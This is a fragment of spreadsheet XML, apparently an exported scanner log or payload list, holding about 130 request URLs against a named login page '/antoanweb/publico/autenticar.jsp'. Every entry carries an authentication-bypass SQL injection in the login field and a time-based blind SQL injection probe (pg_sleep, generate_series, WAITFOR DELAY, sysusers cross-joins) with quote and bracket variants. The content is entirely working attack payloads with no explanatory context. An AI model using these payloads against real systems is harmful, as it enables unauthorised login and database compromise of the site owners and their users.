  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and5665=(select5665frompg_sleep(5))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and5665=(select5665frompg_sleep(5))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and5665=(select5665frompg_sleep(5))and(1637=1637</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))and5665=(select5665frompg_sleep(5))and((3980=3980</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))and5665=(select5665frompg_sleep(5))and(((3104=3104</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarand5665=(select5665frompg_sleep(5))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and5665=(select5665frompg_sleep(5))and('tqei'='tqei</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and5665=(select5665frompg_sleep(5))and(('ahqe'='ahqe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and5665=(select5665frompg_sleep(5))and((('glhl'='glhl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and5665=(select5665frompg_sleep(5))and'fitc'='fitc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and5665=(select5665frompg_sleep(5))and('wohj'like'wohj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and5665=(select5665frompg_sleep(5))and(('cqkz'like'cqkz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and5665=(select5665frompg_sleep(5))and((('oeqw'like'oeqw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and5665=(select5665frompg_sleep(5))and'owjq'like'owjq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and5665=(select5665frompg_sleep(5))and("grbu"="grbu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and5665=(select5665frompg_sleep(5))and(("zlfz"="zlfz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and5665=(select5665frompg_sleep(5))and((("ywbc"="ywbc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and5665=(select5665frompg_sleep(5))and"bzbv"="bzbv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and5665=(select5665frompg_sleep(5))and("qmgy"like"qmgy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and5665=(select5665frompg_sleep(5))and(("mved"like"mved</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and5665=(select5665frompg_sleep(5))and((("ihhd"like"ihhd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and5665=(select5665frompg_sleep(5))and"brdz"like"brdz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and3710=(select3710frompg_sleep(5))--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and3710=(select3710frompg_sleep(5))--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and3710=(select3710frompg_sleep(5))--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and3710=(select3710frompg_sleep(5))--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and3710=(select3710frompg_sleep(5))--and(5326=5326</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))and3710=(select3710frompg_sleep(5))--and((4807=4807</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))and3710=(select3710frompg_sleep(5))--and(((397=397</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarand3710=(select3710frompg_sleep(5))--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and3710=(select3710frompg_sleep(5))--and('ivkg'='ivkg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and3710=(select3710frompg_sleep(5))--and(('hwav'='hwav</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and3710=(select3710frompg_sleep(5))--and((('kica'='kica</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and3710=(select3710frompg_sleep(5))--and'yttk'='yttk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and3710=(select3710frompg_sleep(5))--and('xkfi'like'xkfi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and3710=(select3710frompg_sleep(5))--and(('tdyu'like'tdyu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and3710=(select3710frompg_sleep(5))--and((('bxlv'like'bxlv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and3710=(select3710frompg_sleep(5))--and'jsac'like'jsac</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and3710=(select3710frompg_sleep(5))--and("gjco"="gjco</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and3710=(select3710frompg_sleep(5))--and(("tonu"="tonu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and3710=(select3710frompg_sleep(5))--and((("dgod"="dgod</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and3710=(select3710frompg_sleep(5))--and"zgbe"="zgbe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and3710=(select3710frompg_sleep(5))--and("cnuy"like"cnuy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and3710=(select3710frompg_sleep(5))--and(("ywqz"like"ywqz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and3710=(select3710frompg_sleep(5))--and((("pykv"like"pykv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and3710=(select3710frompg_sleep(5))--and"eaml"like"eaml</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and7696=(selectcount(*)fromgenerate_series(1,5000000))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and7696=(selectcount(*)fromgenerate_series(1,5000000))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and7696=(selectcount(*)fromgenerate_series(1,5000000))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and7696=(selectcount(*)fromgenerate_series(1,5000000))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and7696=(selectcount(*)fromgenerate_series(1,5000000))and(6625=6625</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))and7696=(selectcount(*)fromgenerate_series(1,5000000))and((8660=8660</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))and7696=(selectcount(*)fromgenerate_series(1,5000000))and(((7845=7845</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarand7696=(selectcount(*)fromgenerate_series(1,5000000))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and7696=(selectcount(*)fromgenerate_series(1,5000000))and('qesl'='qesl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and7696=(selectcount(*)fromgenerate_series(1,5000000))and(('kxdh'='kxdh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and7696=(selectcount(*)fromgenerate_series(1,5000000))and((('smjt'='smjt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and7696=(selectcount(*)fromgenerate_series(1,5000000))and'dajy'='dajy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and7696=(selectcount(*)fromgenerate_series(1,5000000))and('tnlm'like'tnlm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and7696=(selectcount(*)fromgenerate_series(1,5000000))and(('vsaq'like'vsaq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and7696=(selectcount(*)fromgenerate_series(1,5000000))and((('tplm'like'tplm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and7696=(selectcount(*)fromgenerate_series(1,5000000))and'lpts'like'lpts</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and7696=(selectcount(*)fromgenerate_series(1,5000000))and("loee"="loee</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and7696=(selectcount(*)fromgenerate_series(1,5000000))and(("ksno"="ksno</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and7696=(selectcount(*)fromgenerate_series(1,5000000))and((("jyss"="jyss</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and7696=(selectcount(*)fromgenerate_series(1,5000000))and"bnkr"="bnkr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and7696=(selectcount(*)fromgenerate_series(1,5000000))and("iroa"like"iroa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and7696=(selectcount(*)fromgenerate_series(1,5000000))and(("svub"like"svub</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and7696=(selectcount(*)fromgenerate_series(1,5000000))and((("dbkp"like"dbkp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and7696=(selectcount(*)fromgenerate_series(1,5000000))and"jvqf"like"jvqf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and2146=(selectcount(*)fromgenerate_series(1,5000000))--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and2146=(selectcount(*)fromgenerate_series(1,5000000))--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and2146=(selectcount(*)fromgenerate_series(1,5000000))--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and2146=(selectcount(*)fromgenerate_series(1,5000000))--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and2146=(selectcount(*)fromgenerate_series(1,5000000))--and(8469=8469</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))and2146=(selectcount(*)fromgenerate_series(1,5000000))--and((4953=4953</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))and2146=(selectcount(*)fromgenerate_series(1,5000000))--and(((9359=9359</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarand2146=(selectcount(*)fromgenerate_series(1,5000000))--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and2146=(selectcount(*)fromgenerate_series(1,5000000))--and('dplv'='dplv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and2146=(selectcount(*)fromgenerate_series(1,5000000))--and(('lggv'='lggv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and2146=(selectcount(*)fromgenerate_series(1,5000000))--and((('lfyl'='lfyl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and2146=(selectcount(*)fromgenerate_series(1,5000000))--and'mbox'='mbox</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and2146=(selectcount(*)fromgenerate_series(1,5000000))--and('kqof'like'kqof</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and2146=(selectcount(*)fromgenerate_series(1,5000000))--and(('dsmz'like'dsmz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and2146=(selectcount(*)fromgenerate_series(1,5000000))--and((('lzvn'like'lzvn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and2146=(selectcount(*)fromgenerate_series(1,5000000))--and'xntw'like'xntw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and2146=(selectcount(*)fromgenerate_series(1,5000000))--and("fnvd"="fnvd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and2146=(selectcount(*)fromgenerate_series(1,5000000))--and(("lhrn"="lhrn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and2146=(selectcount(*)fromgenerate_series(1,5000000))--and((("mhwg"="mhwg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and2146=(selectcount(*)fromgenerate_series(1,5000000))--and"qfgv"="qfgv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and2146=(selectcount(*)fromgenerate_series(1,5000000))--and("fmti"like"fmti</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and2146=(selectcount(*)fromgenerate_series(1,5000000))--and(("ghsb"like"ghsb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and2146=(selectcount(*)fromgenerate_series(1,5000000))--and((("hkit"like"hkit</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and2146=(selectcount(*)fromgenerate_series(1,5000000))--and"jpia"like"jpia</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)waitfordelay'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')waitfordelay'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'waitfordelay'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"waitfordelay'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)waitfordelay'0:0:5'--and(207=207</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))waitfordelay'0:0:5'--and((803=803</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))waitfordelay'0:0:5'--and(((2072=2072</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarwaitfordelay'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')waitfordelay'0:0:5'--and('rbhq'='rbhq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))waitfordelay'0:0:5'--and(('tchd'='tchd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))waitfordelay'0:0:5'--and((('bamx'='bamx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'waitfordelay'0:0:5'--and'zkej'='zkej</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')waitfordelay'0:0:5'--and('tmux'like'tmux</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))waitfordelay'0:0:5'--and(('wnsk'like'wnsk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))waitfordelay'0:0:5'--and((('xrpu'like'xrpu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'waitfordelay'0:0:5'--and'lhxv'like'lhxv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")waitfordelay'0:0:5'--and("fptk"="fptk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))waitfordelay'0:0:5'--and(("eepr"="eepr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))waitfordelay'0:0:5'--and((("wehg"="wehg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"waitfordelay'0:0:5'--and"mfbe"="mfbe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")waitfordelay'0:0:5'--and("ofjz"like"ofjz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))waitfordelay'0:0:5'--and(("jpag"like"jpag</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))waitfordelay'0:0:5'--and((("lbvg"like"lbvg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"waitfordelay'0:0:5'--and"utwx"like"utwx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and9644=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and9644=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and9644=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and9644=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and9644=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and(2244=2244</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))and9644=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and((6270=6270</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))and9644=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and(((8439=8439</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarand9644=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and9644=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and('indd'='indd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and9644=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and(('slpj'='slpj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and9644=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and((('pszd'='pszd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and9644=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and'acvj'='acvj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and9644=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and('iohw'like'iohw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and9644=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and(('ezeq'like'ezeq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and9644=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and((('zccp'like'zccp</t>
  </si>
